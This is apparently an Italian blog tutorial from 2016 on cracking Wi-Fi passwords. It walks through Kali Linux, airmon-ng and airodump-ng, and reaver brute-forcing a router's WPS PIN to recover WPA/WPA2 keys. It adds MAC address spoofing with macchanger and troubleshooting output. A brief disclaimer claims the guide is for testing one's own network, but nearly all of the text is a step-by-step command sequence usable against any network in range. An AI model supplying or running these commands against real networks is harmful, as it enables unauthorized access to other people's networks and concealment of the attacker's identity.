Crackare password wifi

04/01/2016

ATTENZIONE

Rilascio questa guida per testare la sicurezza della propria rete e non mi assumo alcuna responsabilità dell'utilizzo illecito di queste nozioni.

Di cosa abbiamo bisogno

Consiglio vivamente l'installazione di Kali Linux.

Kali Linux è una distribuzione basata su Debian GNU/Linux pensata per l'informatica forense e la sicurezza informatica creata e gestita da Offensive Security. È considerato il successore di BackTrack Linux.

Questo sistema operativo contiene tutti i software che andremo ad utilizzare: aircrack e reaver. Se avete già installato un sistema operativo Linux potete installare questi due software separatamente.

Come utilizzare il software

Avviamo il terminale e scriviamo (nota bene: dovete essere loggati come root)

iwconfig

Questo comando serve a trovare il wireless card.
Molto probabilmente sarà wlan0mon ma se avete più di una scheda di rete o avete qualche configurazione inusuale potrebbe essere diverso.

Assumendo che il wireless card sia wlan0mon digitate la seguente istruzione

airmon-ng start wlan0mon

Questo comando serve a trovare il monitor mode interface.
Molto probabilmente sarà wlan0mon.

Ora per avviare reaver in modo corretto abbiamo bisogno dell'identificatore univoco del router ossia il BSSID rintracciabile con questo comando.

airodump-ng wlan0mon -wps

Se questo comando non dovesse restituire un output corretto provate con questo airodump-ng mon0.

In caso di errore utilizzate il comando iwconfig wlan0 mode monitor prima di airodump.

Troverete ora l'elenco delle reti wi-fi disponibili.

Ora eseguite questo comando

reaver -i moninterface -b bssid -vv

Ecco un comando d'esempio reaver -i wlan0mon -b 8D:AE:9D:65:1F:B2 -vv.
Reaver inizierà ora a cercare la password del wi-fi selezionato. Potete interrompere il processo in qualunque momento premendo CTRL + C ma reaver salverà comunque il progresso in modo da poter poi riprendere da dove era rimasto.

Come funziona Reaver

Reaver utilizza una vulnerabilità dei router, il Wi-Fi Protected Setup o WPS che è basato su un pin codificato all'interno del device. Potrebbe metterci abbastanza tempo ma è in grado di rivelare password WPA e WPA2.

Per ottenere la password dal pin:

reaver -p 12345678
Utility

Come cambiare inidirizzo mac.

airmon-ng stop
ifconfig
macchanger --mac 00:11:22:33:44:55
airmon-ng start

Percorso di salvataggio progressi: /usr/local/etc/reaver/.

Alcuni problemi
root@kali:~# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
airmon-ng check kill

La guida termina qui. A breve scriverò come andare a crackare wi-fi protetti da chiave WEP.